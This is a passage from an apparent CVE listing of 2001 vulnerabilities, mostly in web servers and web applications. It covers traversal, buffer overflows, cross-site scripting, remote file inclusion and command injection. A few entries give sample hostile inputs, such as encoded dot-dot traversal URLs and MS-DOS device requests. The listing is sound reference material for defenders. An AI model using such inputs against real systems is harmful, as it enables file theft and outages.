HTTP GET request. [CVE-2001-1281] Web Messaging Server for Ipswitch IMail 7.04 and earlier allows remote authenticated users to change information for other users by modifying the olduser parameter in the "Change User Information" web form. [CVE-2001-1254] Web Access component for COM2001 Alexis 2.0 and 2.1 in InternetPBX sends username and voice mail passwords in the clear via a Java applet that sends the information to port 8888 of the server, which could allow remote attackers to steal the passwords via sniffing. [CVE-2001-1250] vWebServer 1.2.0 allows remote attackers to cause a denial of service (hang) via a small number of long URL requests, possibly due to a buffer overflow. [CVE-2001-1249] vWebServer 1.2.0 allows remote attackers to cause a denial of service via a URL that contains MS-DOS device names. [CVE-2001-1248] vWebServer 1.2.0 allows remote attackers to view arbitrary ASP scripts via a request for an ASP script that ends with a URL-encoded space character (%20). [CVE-2001-1247] PHP 4.0.4pl1 and 4.0.5 in safe mode allows remote attackers to read and write files owned by the web server UID by uploading a PHP script that uses the error_log function to access the files. [CVE-2001-1237] Phormation PHP script 0.9.1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the phormationdir variable. [CVE-2001-1236] myphpPagetool PHP script 0.4.3-1 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable. [CVE-2001-1235] pSlash PHP script 0.7 and earlier allows remote attackers to execute arbitrary code by including files from remote web sites, using an HTTP request that modifies the includedir variable. [CVE-2001-1234] Bharat Mediratta Gallery PHP script before 1.2.1 allows remote attackers to execute arbitrary code by including files from remote web sites via an HTTP request that modifies the includedir variable. [CVE-2001-1233] Netware Enterprise Web Server 5.1 running GroupWise WebAccess 5.5 with Novell Directory Services (NDS) enabled allows remote attackers to enumerate user names, group names and other system information by accessing ndsobj.nlm. [CVE-2001-1232] GroupWise WebAccess 5.5 with directory indexing enabled allows a remote attacker to view arbitrary directory contents via an HTTP request with a lowercase "get". [CVE-2001-1223] The web administration server for ELSA Lancom 1100 Office does not require authentication, which allows arbitrary remote attackers to gain administrative privileges by connecting to the server. [CVE-2001-1219] Microsoft Internet Explorer 6.0 and earlier allows malicious website operators to cause a denial of service (client crash) via JavaScript that continually refreshes the window via self.location. [CVE-2001-1210] Cisco ubr900 series routers that conform to the Data-over-Cable Service Interface Specifications (DOCSIS) standard must ship without SNMP access restrictions, which can allow remote attackers to read and write information to the MIB using arbitrary community strings. [CVE-2001-1196] Directory traversal vulnerability in edit_action.cgi of Webmin Directory 0.91 allows attackers to gain privileges via a '..' (dot dot) in the argument. [CVE-2001-1192] Citrix Independent Computing Architecture (ICA) Client for Windows 6.1 allows remote malicious web sites to execute arbitrary code via a .ICA file, which is downloaded and automatically executed by the client. [CVE-2001-1191] WebSeal in IBM Tivoli SecureWay Policy Director 3.8 allows remote attackers to cause a denial of service (crash) via a URL that ends in %2e. [CVE-2001-1189] IBM Websphere Application Server 3.5.3 and earlier stores a password in cleartext in the sas.server.props file, which allows local users to obtain the passwords via a JSP script. [CVE-2001-1161] Cross-site scripting (CSS) vulnerability in Lotus Domino 5.0.6 allows remote attackers to execute script on other web clients via a URL that ends in Javascript, which generates an error message that does not quote the resulting script. [CVE-2001-1157] Baltimore Technologies WEBsweeper 4.0 and 4.02 does not properly filter Javascript from HTML pages, which could allow remote attackers to bypass the filtering via (1) an extra leading < and one or more characters before the SCRIPT tag, or (2) tags using Unicode. [CVE-2001-1152] Baltimore Technologies WEBsweeper 4.02, when used to manage URL blacklists, allows remote attackers to bypass blacklist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters. [CVE-2001-1150] Vulnerability in cgiWebupdate.exe in Trend Micro OfficeScan Corporate Edition (aka Virus Buster) 3.5.2 through 3.5.4 allows remote attackers to read arbitrary files. [CVE-2001-1135] ZyXEL Prestige 642R and 642R-I routers do not filter the routers' Telnet and FTP ports on the external WAN interface from inside access, allowing someone on an internal computer to reconfigure the router, if the password is known. [CVE-2001-1115] generate.cgi in SIX-webboard 2.01 and before allows remote attackers to read arbitrary files via a dot dot (..) in the content parameter. [CVE-2001-1103] FTP Voyager ActiveX control before 8.0, when it is marked as safe for scripting (the default) or if allowed by the IObjectSafety interface, allows remote attackers to execute arbitrary commands. [CVE-2001-1084] Cross-site scripting vulnerability in Allaire JRun 3.0 and 2.3.3 allows a malicious webmaster to embed Javascript in a request for a .JSP, .shtml, .jsp10, .jrun, or .thtml file that does not exist, which causes the Javascript to be inserted into an error message. [CVE-2001-1074] Webmin 0.84 and earlier does not properly clear the HTTP_AUTHORIZATION environment variable when the web server is restarted, which makes authentication information available to all CGI programs and allows local users to gain privileges. [CVE-2001-1073] Webridge PX Application Suite allows remote attackers to obtain sensitive information via a malformed request that generates a server error message, which includes full pathname or internal IP address information in the variables (1) APPL_PHYSICAL_PATH, (2) PATH_TRANSLATED, and (3) LOCAL_ADDR. [CVE-2001-1065] Web-based configuration utility in Cisco 600 series routers running CBOS 2.0.1 through 2.4.2ap binds itself to port 80 even when web-based configuration services are disabled, which could leave the router open to attack. [CVE-2001-1054] PHPAdsNew PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1052] Empris PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1051] Dark Hart Portal (darkportal) PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1050] CCCSoftware CCC PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1049] Phorecast PHP script before 0.40 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1048] AWOL PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1045] Directory traversal vulnerability in basilix.php3 in Basilix Webmail 1.0.3beta and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the request_id[DUMMY] parameter. [CVE-2001-1044] Basilix Webmail 0.9.7beta, and possibly other versions, stores .class and .inc files under the document root and does not restrict access, which could allows remote attackers to obtain sensitive information such as MySQL passwords and usernames from the mysql.class file. [CVE-2001-1023] Xcache 2.1 allows remote attackers to determine the absolute path of web server documents by requesting a URL that is not cached by Xcache, which returns the full pathname in the Content-PageName header. [CVE-2001-1018] Lotus Domino web server 5.08 allows remote attackers to determine the internal IP address of the server when NAT is enabled via a GET request that contains a long sequence of / (slash) characters. [CVE-2001-1014] eshop.pl in WebDiscount(e)shop allows remote attackers to execute arbitrary commands via shell metacharacters in the seite parameter. [CVE-2001-1003] Respondus 1.1.2 for WebCT uses weak encryption to remember usernames and passwords, which allows local users who can read the WEBCT.SVR file to decrypt the passwords and gain additional privileges. [CVE-2001-0997] Textor Webmasters Ltd listrec.pl CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the TEMPLATE parameter. [CVE-2001-0987] Cross-site scripting vulnerability in CGIWrap before 3.7 allows remote attackers to execute arbitrary Javascript on other web clients by causing the Javascript to be inserted into error messages that are generated by CGIWrap. [CVE-2001-0986] SQLQHit.asp sample file in Microsoft Index Server 2.0 allows remote attackers to obtain sensitive information such as the physical path, file attributes, or portions of source code by directly calling sqlqhit.asp with a CiScope parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo. [CVE-2001-0982] Directory traversal vulnerability in IBM Tivoli WebSEAL Policy Director 3.01 through 3.7.1 allows remote attackers to read arbitrary files or directories via encoded .. (dot dot) sequences containing "%2e" strings. [CVE-2001-0980] docview before 1.0-15 allows remote attackers to execute arbitrary commands via shell metacharacters that are processed when converting a man page to a web page. [CVE-2001-0971] Directory traversal vulnerability in ACI 4d webserver allows remote attackers to read arbitrary files via a .. (dot dot) or drive letter (e.g., C:) in an HTTP request. [CVE-2001-0969] ipfw in FreeBSD does not properly handle the use of "me" in its rules when point to point interfaces are used, which causes ipfw to allow connections from arbitrary remote hosts. [CVE-2001-0962] IBM WebSphere Application Server 3.02 through 3.53 uses predictable session IDs for cookies, which allows remote attackers to gain privileges of WebSphere users via brute force guessing. [CVE-2001-0955] Buffer overflow in fbglyph.c in XFree86 before 4.2.0, related to glyph clipping for large origins, allows attackers to cause a denial of service and possibly gain privileges via a large number of characters, possibly through the web page search form of KDE Konqueror or from an xterm command with a long title. [CVE-2001-0953] Kebi WebMail allows remote attackers to access the administrator menu and gain privileges via the /a/ hidden directory, which is installed under the web document root. [CVE-2001-0926] SSIFilter in Allaire JRun 3.1, 3.0 and 2.3.3 allows remote attackers to obtain source code for Java server pages (.jsp) and other files in the web root via an HTTP request for a non-existent SSI page, in which the request's body has an #include statement. [CVE-2001-0924] Directory traversal vulnerability in ifx CGI program in Informix Web DataBlade allows remote attackers to read arbitrary files via a .. (dot dot) in the LO parameter. [CVE-2001-0910] Legato Networker before 6.1 allows remote attackers to bypass access restrictions and gain privileges on the Networker interface by spoofing the admin server name and IP address and connecting to Networker from an IP address whose hostname can not be determined by a DNS reverse lookup. [CVE-2001-0904] Internet Explorer 5.5 and 6 with the Q312461 (MS01-055) patch modifies the HTTP_USER_AGENT (UserAgent) information that indicates that the patch has been installed, which could allow remote malicious web sites to more easily identify and exploit vulnerable clients. [CVE-2001-0902] Microsoft IIS 5.0 allows remote attackers to spoof web log entries via an HTTP request that includes hex-encoded newline or form-feed characters. [CVE-2001-0895] Multiple Cisco networking products allow remote attackers to cause a denial of service on the local network via a series of ARP packets sent to the router's interface that contains a different MAC address for the router, which eventually causes the router to overwrite the MAC address in its ARP table. [CVE-2001-0892] Acme Thttpd Secure Webserver before 2.22, with the chroot option enabled, allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /. [CVE-2001-0884] Cross-site scripting vulnerability in Mailman email archiver before 2.08 allows attackers to obtain sensitive information or authentication credentials via a malicious link that is accessed by other web users. [CVE-2001-0874] Internet Explorer 5.5 and 6.0 allow remote attackers to read certain files via HTML that passes information from a frame in the client's domain to a frame in the web site's domain, a variant of the "Frame Domain Verification" vulnerability. [CVE-2001-0866] Cisco 12000 with IOS 12.0 and lines card based on Engine 2 does not properly handle an outbound ACL when an input ACL is not configured on all the interfaces of a multi port line card, which could allow remote attackers to bypass the intended access controls. [CVE-2001-0857] Cross-site scripting vulnerability in status.php3 in Imp Webmail 2.2.6 and earlier allows remote attackers to gain access to the e-mail of other users by hijacking session cookies via the message parameter. [CVE-2001-0847] Lotus Domino Web Server 5.x allows remote attackers to gain sensitive information by accessing the default navigator $defaultNav via (1) URL encoding the request, or (2) directly requesting the ReplicaID. [CVE-2001-0846] Lotus Domino 5.x allows remote attackers to read files or execute arbitrary code by requesting the ReplicaID of the Web Administrator template file (webadmin.ntf). [CVE-2001-0836] Buffer overflow in Oracle9iAS Web Cache 2.0.0.1 allows remote attackers to execute arbitrary code via a long HTTP GET request. [CVE-2001-0835] Cross-site scripting vulnerability in Webalizer 2.01-06, and possibly other versions, allows remote attackers to inject arbitrary HTML tags by specifying them in (1) search keywords embedded in HTTP referrer information, or (2) host names that are retrieved via a reverse DNS lookup. [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message. [CVE-2001-0828] A cross-site scripting vulnerability in Caucho Technology Resin before 1.2.4 allows a malicious webmaster to embed Javascript in a hyperlink that ends in a .jsp extension, which causes an error message that does not properly quote the Javascript. [CVE-2001-0824] Cross-site scripting vulnerability in IBM WebSphere 3.02 and 3.5 FP2 allows remote attackers to execute Javascript by inserting the Javascript into (1) a request for a .JSP file, or (2) a request to the webapp/examples/ directory, which inserts the Javascript into an error page. [CVE-2001-0808] gnatsweb.pl in GNATS GnatsWeb 2.7 through 3.95 allows remote attackers to execute arbitrary commands via certain characters in the help_file parameter. [CVE-2001-0807] Internet Explorer 5.0, and possibly other versions, may allow remote attackers (malicious web pages) to read known text files from a client's hard drive via a SCRIPT tag with a SRC value that points to the text file. [CVE-2001-0805] Directory traversal vulnerability in ttawebtop.cgi in Tarantella Enterprise 3.00 and 3.01 allows remote attackers to read arbitrary files via a .. (dot dot) in the pg parameter. [CVE-2001-0761] Buffer overflow in HttpSave.dll in Trend Micro InterScan WebManager 1.2 allows remote attackers to execute arbitrary code via a long value to a certain parameter. [CVE-2001-0760] Citrix Nfuse 1.51 allows remote attackers to obtain the absolute path of the web root via a malformed request to launch.asp that does not provide the session field. [CVE-2001-0749] Beck IPC GmbH IPC@CHIP Embedded-Webserver allows remote attackers to read arbitrary files via a webserver root directory set to system root. [CVE-2001-0747] Buffer overflow in iPlanet Web Server (iWS) Enterprise Edition 4.1, service packs 3 through 7, allows remote attackers to cause a denial of sevice and possibly execute arbitrary code via a long method name in an HTTP request. [CVE-2001-0746] Buffer overflow in Web Publisher in iPlanet Web Server Enterprise Edition 4.1 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a request for a long URI with (1) GETPROPERTIES, (2) GETATTRIBUTENAMES, or other methods. [CVE-2001-0743] Paging function in O'Reilly WebBoard Pager 4.10 allows remote attackers to cause a denial of service via a message with an escaped ' character followed by JavaScript commands. [CVE-2001-0739] Guardian Digital WebTool in EnGarde Secure Linux 1.0.1 allows restarted services to inherit some environmental variables, which could allow local users to gain root privileges. [CVE-2001-0728] Buffer overflow in Compaq Management Agents before 5.2, included in Compaq Web-enabled Management Software, allows local users to gain privileges. [CVE-2001-0726] Outlook Web Access (OWA) in Microsoft Exchange 5.5 Server, when used with Internet Explorer, does not properly detect certain inline script, which can allow remote attackers to perform arbitrary actions on a user's Exchange mailbox via an HTML e-mail message. [CVE-2001-0711] Cisco IOS 11.x and 12.0 with ATM support allows attackers to cause a denial of service via the undocumented Interim Local Management Interface (ILMI) SNMP community string. [CVE-2001-0705] Directory traversal vulnerability in tradecli.dll in Arcadia Internet Store 1.0 allows a remote attacker to read arbitrary files on the web server via a URL with "dot dot" sequences in the template argument. [CVE-2001-0693] WebTrends HTTP Server 3.1c and 3.5 allows a remote attacker to view script source code via a filename followed by an encoded space (%20). [CVE-2001-0687] Broker FTP server 5.9.5 for Windows NT and 9x allows a remote attacker to retrieve privileged web server system information by (1) issuing a CD command (CD C:) followed by the LS command, (2) specifying arbitrary paths in the UNC format (\\computername\sharename). [CVE-2001-0680] Directory traversal vulnerability in ftpd in QPC QVT/Net 4.0 and AVT/Term 5.0 allows a remote attacker to traverse directories on the web server via a "dot dot" attack in a LIST (ls) command. [CVE-2001-0678] A buffer overflow in reggo.dll file used by Trend Micro InterScan VirusWall prior to 3.51 build 1349 for Windows NT 3.5 and InterScan WebManager 1.2 allows a local attacker to execute arbitrary code. [CVE-2001-0674] Directory traversal vulnerability in RobTex Viking Web server before 1.07-381 allows remote attackers to read arbitrary files via a hexadecimal encoded dot-dot attack (eg. http://www.server.com/%2e%2e/%2e%2e) in an HTTP URL request. [CVE-2001-0666] Outlook Web Access (OWA) in Microsoft Exchange 2000 allows an authenticated user to cause a denial of service (CPU consumption) via a malformed OWA request for a deeply nested folder within the user's mailbox. [CVE-2001-0665] Internet Explorer 6 and earlier allows remote attackers to cause certain HTTP requests to be automatically executed and appear to come from the user, which could allow attackers to gain privileges or execute operations within web-based services, aka the "HTTP Request Encoding vulnerability." [CVE-2001-0660] Outlook Web Access (OWA) in Microsoft Exchange 5.5, SP4 and earlier, allows remote attackers to identify valid user email addresses by directly accessing a back-end function that processes the global address list (GAL). [CVE-2001-0649] Personal Web Sharing 1.5.5 allows a remote attacker to cause a denial of service via a long HTTP request. [CVE-2001-0647] Orange Web Server 2.1, based on GoAhead, allows a remote attacker to perform a denial of service via an HTTP GET request that does not include the HTTP version. [CVE-2001-0633] Directory traversal vulnerability in Sun Chili!Soft ASP on multiple Unixes allows a remote attacker to read arbitrary files above the web root via a '..' (dot dot) attack in the sample script 'codebrws.asp'. [CVE-2001-0626] O'Reilly Website Professional 2.5.4 and earlier allows remote attackers to determine the physical path to the root directory via a URL request containing a ":" character. [CVE-2001-0621] The FTP server on Cisco Content Service 11000 series switches (CSS) before WebNS 4.01B23s and WebNS 4.10B13s allows an attacker who is an FTP user to read and write arbitrary files via GET or PUT commands. [CVE-2001-0608] HP architected interface facility (AIF) as includes with MPE/iX 5.5 through 6.5 running on a HP3000 allows an attacker to gain additional privileges and gain access to databases via the AIF - AIFCHANGELOGON program. [CVE-2001-0606] Vulnerability in iPlanet Web Server 4.X in HP-UX 11.04 (VVOS) with VirtualVault A.04.00 allows a remote attacker to create a denial of service via the HTTPS service. [CVE-2001-0583] Alt-N Technologies MDaemon 3.5.4 allows a remote attacker to create a denial of service via the URL request of a MS-DOS device (such as GET /aux) to (1) the Worldclient service at port 3000, or (2) the Webconfig service at port 3001. [CVE-2001-0571] Directory traversal vulnerability in the web server for (1) Elron Internet Manager (IM) Message Inspector and (2) Anti-Virus before 3.0.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the requested URL. [CVE-2001-0568] Digital Creations Zope 2.3.1 b1 and earlier allows a local attacker (Zope user) with through-the-web scripting capabilities to alter ZClasses class attributes. [CVE-2001-0564] APC Web/SNMP Management Card prior to Firmware 310 only supports one telnet connection, which allows a remote attacker to create a denial of service via repeated failed logon attempts which temporarily locks the card. [CVE-2001-0558] T. Hauck Jana Webserver 2.01 beta 1 and earlier allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device name (i.e. GET /aux HTTP/1.0). [CVE-2001-0557] T. Hauck Jana Webserver 1.46 and earlier allows a remote attacker to view arbitrary files via a '..' (dot dot) attack which is URL encoded (%2e%2e). [CVE-2001-0538] Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page. [CVE-2001-0535] Example applications (Exampleapps) in ColdFusion Server 4.x do not properly restrict prevent access from outside the local host's domain, which allows remote attackers to conduct upload, read, or execute files by spoofing the "HTTP Host" (CGI.Host) variable in (1) the "Web Publish" example script, and (2) the "Email" example script. [CVE-2001-0508] Vulnerability in IIS 5.0 allows remote attackers to cause a denial of service (restart) via a long, invalid WebDAV request. [CVE-2001-0495] Directory traversal in DataWizard WebXQ server 1.204 allows remote attackers to view files outside of the web root via a .. (dot dot) attack. [CVE-2001-0492] Netcruiser Web server version 0.1.2.8 and earlier allows remote attackers to determine the physical path of the server via a URL containing (1) con, (2) com2, or (3) com3. [CVE-2001-0483] Configuration error in Axent Raptor Firewall 6.5 allows remote attackers to use the firewall as a proxy to access internal web resources when the http.noproxy Rule is not set. [CVE-2001-0477] Vulnerability in WebCalendar 0.9.26 allows remote command execution. [CVE-2001-0467] Directory traversal vulnerability in RobTex Viking Web server before 1.07-381 allows remote attackers to read arbitrary files via a \... (modified dot dot) in an HTTP URL request. [CVE-2001-0464] Buffer overflow in websync.exe in Cyberscheduler allows remote attackers to execute arbitrary commands via a long tzs (timezone) parameter. [CVE-2001-0462] Directory traversal vulnerability in Perl web server 0.3 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2001-0460] Websweeper 4.0 does not limit the length of certain HTTP headers, which allows remote attackers to cause a denial of service (memory exhaustion) via an extremely large HTTP Referrer: header. [CVE-2001-0453] Directory traversal vulnerability in BRS WebWeaver HTTP server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the (1) syshelp, (2) sysimages, or (3) scripts directories. [CVE-2001-0452] BRS WebWeaver FTP server before 0.64 Beta allows remote attackers to obtain the real pathname of the server via a "CD " command followed by an ls command. [CVE-2001-0448] Web configuration server in 602Pro LAN SUITE allows remote attackers to cause a denial of service via an HTTP GET HTTP request to the aux directory, and possibly other directories with legacy DOS device names. [CVE-2001-0447] Web configuration server in 602Pro LAN SUITE allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP request containing "%2e" (dot dot) characters. [CVE-2001-0446] IBM WCS (WebSphere Commerce Suite) 4.0.1 with Application Server 3.0.2 allows remote attackers to read source code for .jsp files by appending a / to the requested URL. [CVE-2001-0434] The LogDataListToFile ActiveX function used in (1) Knowledge Center and (2) Back web components of Compaq Presario computers allows remote attackers to modify arbitrary files and cause a denial of service. [CVE-2001-0433] Buffer overflow in Savant 3.0 web server allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long Host HTTP header. [CVE-2001-0431] Vulnerability in iPlanet Web Server Enterprise Edition 4.x. [CVE-2001-0419] Buffer overflow in shared library ndwfn4.so for iPlanet Web Server (iWS) 4.1, when used as a web listener for Oracle application server 4.0.8.2, allows remote attackers to execute arbitrary commands via a long HTTP request that is passed to the application server, such as /jsp/. [CVE-2001-0404] Directory traversal vulnerability in JavaServer Web Dev Kit (JSWDK) 1.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request to the WEB-INF directory. [CVE-2001-0399] Caucho Resin 1.3b1 and earlier allows remote attackers to read source code for Javabean files by inserting a .jsp before the WEB-INF specifier in an HTTP request. [CVE-2001-0396] The pre-login mode in the System Administrator interface of Lightwave ConsoleServer 3200 allows remote attackers to obtain sensitive information such as system status, configuration, and users. [CVE-2001-0394] Remote manager service in Website Pro 3.0.37 allows remote attackers to cause a denial of service via a series of malformed HTTP requests to the /dyn directory. [CVE-2001-0390] IBM Websphere/NetCommerce3 3.1.2 allows remote attackers to cause a denial of service by directly calling the macro.d2w macro with a long string of %0a characters. [CVE-2001-0389] IBM Websphere/NetCommerce3 3.1.2 allows remote attackers to determine the real path of the server by directly calling the macro.d2w macro with a NOEXISTINGHTMLBLOCK argument. [CVE-2001-0385] GoAhead webserver 2.1 allows remote attackers to cause a denial of service via an HTTP request to the /aux directory. [CVE-2001-0374] The HTTP server in Compaq web-enabled management software for (1) Foundation Agents, (2) Survey, (3) Power Manager, (4) Availability Agents, (5) Intelligent Cluster Administrator, and (6) Insight Manager can be used as a generic proxy server, which allows remote attackers to bypass access restrictions via the management port, 2301. [CVE-2001-0367] Mirabilis ICQ WebFront Plug-in ICQ2000b Build 3278 allows a remote attacker to create a denial of service via HTTP URL requests containing a large number of % characters. [CVE-2001-0366] saposcol in SAP R/3 Web Application Server Demo before 1.5 trusts the PATH environmental variable to find and execute the expand program, which allows local users to obtain root access by modifying the PATH to point to a Trojan horse expand program. [CVE-2001-0340] An interaction between the Outlook Web Access (OWA) service in Microsoft Exchange 2000 Server and Internet Explorer allows attackers to execute malicious script code against a user's mailbox via a message attachment that contains HTML code, which is executed automatically. [CVE-2001-0339] Internet Explorer 5.5 and earlier allows remote attackers to display a URL in the address bar that is different than the URL that is actually being displayed, which could be used in web site spoofing attacks, aka the "Web page spoofing vulnerability." [CVE-2001-0338] Internet Explorer 5.5 and earlier does not properly validate digital certificates when Certificate Revocation List (CRL) checking is enabled, which could allow remote attackers to spoof trusted web sites, aka the "Server certificate validation vulnerability." [CVE-2001-0332] Internet Explorer 5.5 and earlier does not properly verify the domain of a frame within a browser window, which allows remote web site operators to read certain files on the client by sending information from a local frame to a frame in a different domain using MSScriptControl.ScriptControl and GetObject, aka a variant of the "Frame Domain Verification" vulnerability. [CVE-2001-0330] Bugzilla 2.10 allows remote attackers to access sensitive information, including the database username and password, via an HTTP request for the globals.pl file, which is normally returned by the web server without being executed. [CVE-2001-0327] iPlanet Web Server Enterprise Edition 4.1 and earlier allows remote attackers to retrieve sensitive data from memory allocation pools, or cause a denial of service, via a URL-encoded Host: header in the HTTP request, which reveals memory in the Location: header that is returned by the server. [CVE-2001-0312] IBM WebSphere plugin for Netscape Enterprise server allows remote attackers to read source code for JSP files via an HTTP request that contains a host header that references a host that is not in WebSphere's host aliases list, which will bypass WebSphere processing. [CVE-2001-0306] Directory traversal vulnerability in ITAfrica WEBactive HTTP Server 1.00 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL. [CVE-2001-0303] tstisapi.dll in Pi3Web 1.0.1 web server allows remote attackers to determine the physical path of the server via a URL that requests a non-existent file. [CVE-2001-0302] Buffer overflow in tstisapi.dll in Pi3Web 1.0.1 web server allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long URL. [CVE-2001-0299] Buffer overflow in Voyager web administration server for Nokia IP440 allows local users to cause a denial of service, and possibly execute arbitrary commands, via a long URL. [CVE-2001-0298] Buffer overflow in WebReflex 1.55 HTTPd allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP GET request. [CVE-2001-0276] ext.dll in BadBlue 1.02.07 Personal Edition web server allows remote attackers to determine the physical path of the server by directly calling ext.dll without any arguments, which produces an error message that contains the path. [CVE-2001-0275] Moby Netsuite Web Server 1.02 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP request. [CVE-2001-0273] pgp4pine Pine/PGP interface version 1.75-6 does not properly check to see if a public key has expired when obtaining the keys via Gnu Privacy Guard (GnuPG), which causes the message to be sent in cleartext. [CVE-2001-0272] Directory traversal vulnerability in sendtemp.pl in W3.org Anaya Web development server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the templ parameter. [CVE-2001-0263] Gene6 G6 FTP Server 2.0 (aka BPFTP Server 2.10) allows attackers to read file attributes outside of the web root via the (1) SIZE and (2) MDTM commands when the "show relative paths" option is not enabled. [CVE-2001-0262] Buffer overflow in Netscape SmartDownload 1.3 allows remote attackers (malicious web pages) to execute arbitrary commands via a long URL. [CVE-2001-0257] Buffer overflow in Easycom/Safecom Print Server Web service, version 404.590 and earlier, allows remote attackers to execute arbitrary commands via (1) a long URL or (2) a long HTTP header field such as "Host:". [CVE-2001-0253] Directory traversal vulnerability in hsx.cgi program in iWeb Hyperseek 2000 allows remote attackers to read arbitrary files and directories via a .. (dot dot) attack in the show parameter. [CVE-2001-0251] The Web Publishing feature in Netscape Enterprise Server 3.x allows remote attackers to cause a denial of service via the REVLOG command. [CVE-2001-0250] The Web Publishing feature in Netscape Enterprise Server 4.x and earlier allows remote attackers to list arbitrary directories under the web server root via the INDEX command. [CVE-2001-0246] Internet Explorer 5.5 and earlier does not properly verify the domain of a frame within a browser window, which allows remote web site operators to read certain files on the client by sending information from a local frame to a frame in a different domain, aka a variant of the "Frame Domain Verification" vulnerability. [CVE-2001-0239] Microsoft Internet Security and Acceleration (ISA) Server 2000 Web Proxy allows remote attackers to cause a denial of service via a long web request with a specific type. [CVE-2001-0238] Microsoft Data Access Component Internet Publishing Provider 8.103.2519.0 and earlier allows remote attackers to bypass Security Zone restrictions via WebDAV requests. [CVE-2001-0228] Directory traversal vulnerability in GoAhead web server 2.1 and earlier allows remote attackers to read arbitrary files via a .. attack in an HTTP GET request. [CVE-2001-0227] Buffer overflow in BiblioWeb web server 2.0 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long HTTP GET request. [CVE-2001-0226] Directory traversal vulnerability in BiblioWeb web server 2.0 allows remote attackers tor ead arbitrary files via a .. (dot dot) or ... attack in an HTTP GET request. [CVE-2001-0222] webmin 0.84 and earlier allows local users to overwrite and create arbitrary files via a symlink attack. [CVE-2001-0211] Directory traversal vulnerability in WebSPIRS 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) attack on the sp.nextform parameter. [CVE-2001-0202] Picserver web server allows remote attackers to read arbitrary files via a .. (dot dot) attack in an HTTP GET request. [CVE-2001-0200] HSWeb 2.0 HTTP server allows remote attackers to obtain the physical path of the server via a request to the /cgi/ directory, which will list the path if directory browsing is enabled. [CVE-2001-0189] Directory traversal vulnerability in LocalWEB2000 HTTP server allows remote attackers to read arbitrary commands via a .. (dot dot) attack in an HTTP GET request. [CVE-2001-0186] Directory traversal vulnerability in Free Java Web Server 1.0 allows remote attackers to read arbitrary files via a .. (dot dot) attack. [CVE-2001-0182] FireWall-1 4.1 with a limited-IP license allows remote attackers to cause a denial of service by sending a large number of spoofed IP packets with various source addresses to the inside interface, which floods the console with warning messages and consumes CPU resources. [CVE-2001-0179] Allaire JRun 3.0 allows remote attackers to list contents of the WEB-INF directory, and the web.xml file in the WEB-INF directory, via a malformed URL that contains a "." [CVE-2001-0177] WebMaster ConferenceRoom 1.8.1 allows remote attackers to cause a denial of service via a buddy relationship between the IRC server and a server clone. [CVE-2001-0151] IIS 5.0 allows remote attackers to cause a denial of service via a series of malformed WebDAV requests. [CVE-2001-0150] Internet Explorer 5.5 and earlier executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands if the IE client is using the Telnet client provided in Services for Unix (SFU) 2.0, which creates session transcripts. [CVE-2001-0134] Buffer overflow in cpqlogin.htm in web-enabled agents for various Compaq management software products such as Insight Manager and Management Agents allows remote attackers to execute arbitrary commands via a long user name. [CVE-2001-0122] Kernel leak in AfpaCache module of the Fast Response Cache Accelerator (FRCA) component of IBM HTTP Server 1.3.x and Websphere 3.52 allows remote attackers to cause a denial of service via a series of malformed HTTP requests that generate a "bad request" error. [CVE-2001-0098] Buffer overflow in Bea WebLogic Server before 5.1.0 allows remote attackers to execute arbitrary commands via a long URL that begins with a ".." string. [CVE-2001-0096] FrontPage Server Extensions (FPSE) in IIS 4.0 and 5.0 allows remote attackers to cause a denial of service via a malformed form, aka the "Malformed Web Form Submission" vulnerability. [CVE-2001-0088] common.inc.php in phpWebLog 0.4.2 does not properly initialize the $CONF array, which inadvertently sets the password to a single character, allowing remote attackers to easily guess the SiteKey and gain administrative privileges to phpWebLog. [CVE-2001-0072] gpg (aka GnuPG) 1.0.4 and other versions imports both public and private keys from public key servers without notifying the user about the private keys, which could allow an attacker to break the web of trust. [CVE-2001-0064] Webconfig, IMAP, and other services in MDaemon 3.5.0 and earlier allows remote attackers to cause a denial of service via a long URL terminated by a "\r\n" string. [CVE-2001-0021] MailMan Webmail 3.0.25 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the alternate_template parameter. [CVE-2001-0009] Directory traversal vulnerability in Lotus Domino 5.0.5 web server allows remote attackers to read 